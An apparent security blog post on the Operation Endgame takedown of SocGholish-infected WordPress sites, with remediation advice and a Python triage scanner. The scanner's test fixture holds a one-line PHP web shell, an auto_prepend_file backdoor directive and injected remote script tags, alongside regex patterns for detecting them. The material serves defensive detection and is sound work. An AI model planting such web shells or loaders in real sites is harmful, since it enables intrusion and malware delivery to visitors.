Operation Endgame Cleaned 15,000 WordPress Sites — Yours Could Be Next
Last week, the FBI, Dutch police, Germany's BKA, and the RCMP — coordinating through Europol and Eurojust — pulled off one of the largest coordinated malware takedowns in history. Operation Endgame dismantled 106 command-and-control servers, seized dozens of domains, and quietly removed backdoors from 14,971 infected WordPress websites. The operation targeted SocGholish (also called FakeUpdates), a JavaScript malware framework that has been quietly weaponizing legitimate small-business websites since 2017.
If your business runs a WordPress site, this story is about your customers as much as it is about the criminals who got taken down.
What SocGholish Actually Does to a Site
The mechanics are grimly clever. Attackers compromise a legitimate WordPress site — a restaurant, a car garage, a dentist office — and inject a thin layer of JavaScript that watches incoming visitors. When someone lands on the page, the JS profiles the browser, checks for sandbox indicators, and then replaces the entire visible page content with a convincing fake: a browser update prompt, a system alert, or a software notification that looks pixel-perfect for the visitor's operating system and browser version.
When the visitor clicks to "update," they download an installer. That installer runs on their machine and installs a backdoor — GhostWeaver, AsyncRAT, NetSupport RAT — which then grants the attackers persistent remote access. From there, the infection chain has historically delivered LockBit and RansomHub ransomware, as well as Dridex (the banking trojan that made Evil Corp infamous). The key detail: the attack happens on the visitor's machine, not on the compromised WordPress site. The site owner is unknowingly turned into an attacker's distribution point.
The Scale Is Hard to Overstate
Shadowserver's data, gathered in support of the operation, identified 1,441,695 instances of compromised legitimate WordPress sites across 187 countries, spanning 271,176 unique IP addresses across 7,550 autonomous systems. That is not a niche campaign. Roughly 55 percent of cloud hosting customers had measurable SocGholish exposure in 2026. The 15,000 sites actually cleaned represent the worst of the worst — the ones actively serving malware payloads — not the full universe of sites with compromised credentials or stale vulnerabilities that made them candidates for infection.
How Sites Got Compromised
SocGholish is not a zero-day campaign. Shadowserver's breakdown of infection methods is depressingly familiar:
- Credential stuffing and brute force — attackers ran leaked username/password lists against wp-admin until they got in. In May 2026 alone, over 1.44 million sets of WordPress site credentials were circulating in criminal markets.
- Plugin and theme vulnerabilities — unpatched vulnerabilities in installed plugins gave attackers unauthenticated footholds without needing any credentials at all.
- Reused passwords from other breaches — site owners who used the same password on their WordPress admin and a breached service handed over access without any active attack.
- Domain shadowing — in some cases, attackers gained access to DNS providers and created malicious subdomains that blended into the victim's legitimate DNS infrastructure, making detection harder.
None of this required a sophisticated state-level attacker. The group behind SocGholish — tracked as DEV-0206, Gold Prelude, and TA569 — operates as an initial access broker: they break in, plant the infrastructure, and rent out the compromised sites to ransomware affiliates including LockBit and RansomHub. The Evil Corp connection means U.S. law enforcement treats payments to these groups as potentially sanctionable, which adds legal complexity for any victim company that considers paying a ransom.
Law Enforcement Cleaned Up, But Didn't Fix Anything
Here is the practical reality: Dutch authorities removed the backdoors and notified affected site owners to take further action. What they did not do is patch the vulnerabilities, change the passwords, or audit the plugin inventory on those sites. The cleanup was surgical (infrastructure taken down, malware removed from the specific 15,000 sites), but the underlying conditions that got those sites infected still exist everywhere else, and they still exist on the cleaned sites until the owner fixes them.
Dutch police's own guidance to affected site owners was four steps: change login credentials, enable multi-factor authentication, remove any unrecognized WordPress accounts, and update WordPress to the latest version. That is the minimum. A complete response should also include:
- Audit every installed plugin and theme: delete anything unused, update everything remaining.
- Review your file system for unexpected .php files in upload directories, which is a classic persistence mechanism.
- Check DNS records for subdomains you didn't create (domain shadowing leaves traces).
- Run a malware scan using a server-side scanner, not just a plugin-level check. SocGholish injections can live in functions.php, .htaccess, or auto-loaded option values in the database.
- Rotate credentials for all admin accounts, the hosting control panel, FTP, and the database.
- Verify your backup chain is intact and clean: a backup made during the infection window is a backup of the infected site.
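The file-system and database checks in the list above, and the injected-script behaviour described under "What SocGholish Actually Does to a Site", as one added Python example. This is not the page's tooling and not what the Dutch police ran on the 15,000 sites; it is a triage script a site owner could point at a WordPress docroot. It reports PHP under wp-content/uploads, scans every theme's functions.php and the root .htaccess for dropper and loader patterns, and applies the same patterns to autoloaded option values. Assumptions: a stock docroot layout; autoloaded options are supplied as (name, value) pairs, for example exported with WP-CLI's `wp option list --autoload=on --format=json`; the sample docroot, the sample options and the example.invalid hostnames are constructed fixtures with one planted lead of each kind.

```python
"""Post-cleanup triage for a WordPress docroot (added example, not the page's
or law enforcement's tooling). Assumes a stock layout and that autoloaded
options are passed in as (name, value) pairs, e.g. from
`wp option list --autoload=on --format=json`."""
import json
import os
import re
import tempfile

# Patterns typical of injected droppers and loaders. A hit is a lead to inspect
# by hand, not proof of compromise: CDN script tags and long base64 blobs do
# occur in legitimate themes.
SUSPICIOUS = [
    (re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)", re.I),
     "eval of decoded payload"),
    (re.compile(r"auto_prepend_file", re.I), "auto_prepend_file directive"),
    (re.compile(r"<script[^>]+src=['\"]https?://", re.I),
     "script tag loading remote JS"),
    (re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"), "long base64-looking blob"),
]
PHP_SUFFIXES = (".php", ".phtml", ".php5", ".phar")


def scan_text(text):
    """Return the label of every pattern that matches the text."""
    return [label for pattern, label in SUSPICIOUS if pattern.search(text)]


def find_php_in_uploads(docroot):
    """wp-content/uploads should hold media only; list any PHP found there."""
    uploads = os.path.join(docroot, "wp-content", "uploads")
    hits = []
    for root, _dirs, files in os.walk(uploads):
        for name in files:
            if name.lower().endswith(PHP_SUFFIXES):
                hits.append(os.path.relpath(os.path.join(root, name), docroot))
    return sorted(hits)


def scan_persistence_files(docroot):
    """Scan the root .htaccess and each theme's functions.php."""
    targets = [os.path.join(docroot, ".htaccess")]
    themes = os.path.join(docroot, "wp-content", "themes")
    if os.path.isdir(themes):
        for theme in sorted(os.listdir(themes)):
            targets.append(os.path.join(themes, theme, "functions.php"))
    findings = {}
    for path in targets:
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            labels = scan_text(fh.read())
        if labels:
            findings[os.path.relpath(path, docroot)] = labels
    return findings


def scan_autoloaded_options(options):
    """Apply the same patterns to (option_name, option_value) pairs."""
    return {name: scan_text(value) for name, value in options if scan_text(value)}


def triage(docroot, options):
    """Run all three checks and return the findings as one dict."""
    return {
        "php_in_uploads": find_php_in_uploads(docroot),
        "persistence_files": scan_persistence_files(docroot),
        "autoloaded_options": scan_autoloaded_options(options),
    }


# Constructed fixture (not a real site): clean files plus one planted lead of
# each kind, so both hits and non-hits are visible. Hostnames use .invalid.
SAMPLE_FILES = {
    "index.php": "<?php require __DIR__ . '/wp-blog-header.php';\n",
    ".htaccess": "RewriteEngine On\nphp_value auto_prepend_file /tmp/.cache.php\n",
    "wp-content/themes/storefront/functions.php":
        "<?php add_action('wp_head', function () {\n"
        "  echo '<script src=\"https://cdn.example.invalid/u.js\"></script>';\n"
        "});\n",
    "wp-content/themes/clean-theme/functions.php":
        "<?php add_theme_support('title-tag');\n",
    "wp-content/uploads/2024/05/photo.jpg": "not a real image\n",
    "wp-content/uploads/2024/05/wp-cache.php":
        "<?php eval(base64_decode($_POST['c']));\n",
}
SAMPLE_OPTIONS = [
    ("siteurl", "https://shop.example.invalid"),
    ("widget_text", 'a:1:{i:2;a:1:{s:4:"text";s:58:"<script src="https://s.example.invalid/x.js"></script>";}}'),
]


def build_sample_docroot():
    """Write SAMPLE_FILES into a fresh temporary directory; return its path."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    print(json.dumps(triage(build_sample_docroot(), SAMPLE_OPTIONS), indent=2))
```

Against a real site, call `triage("/var/www/html", rows)` with the option rows you exported, then compare every flagged file against a known-clean copy of the same theme version before deleting anything: a CDN-hosted script tag or a legitimate base64 blob will match these patterns too, which is why the scan produces leads rather than verdicts. Files that are not in a clean copy at all, such as PHP under uploads, are the ones to preserve for forensics and then remove.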
What This Means for Your Visitors
This is the part that keeps site owners up at night when they find out: their customers — people who trusted their website — may have been served ransomware through an entirely normal-looking visit. No data was stolen from the WordPress site itself. The damage landed on visitors' machines. That is an exposure that does not show up in your own server logs as anything alarming. If visitors reported unusual pop-ups, got infected, and traced it back to your site, the reputational and legal fallout is yours to manage — even though your site was the victim too.
Running 24x7x365 NOC monitoring with file-integrity checks against a known-clean baseline is exactly the kind of thing that catches these injections before they start hurting customers. Restore drills matter too: knowing your clean baseline makes it much faster to confirm what was changed and what was not.
The takedown was a win. The window it created for defenders is narrow. Use it.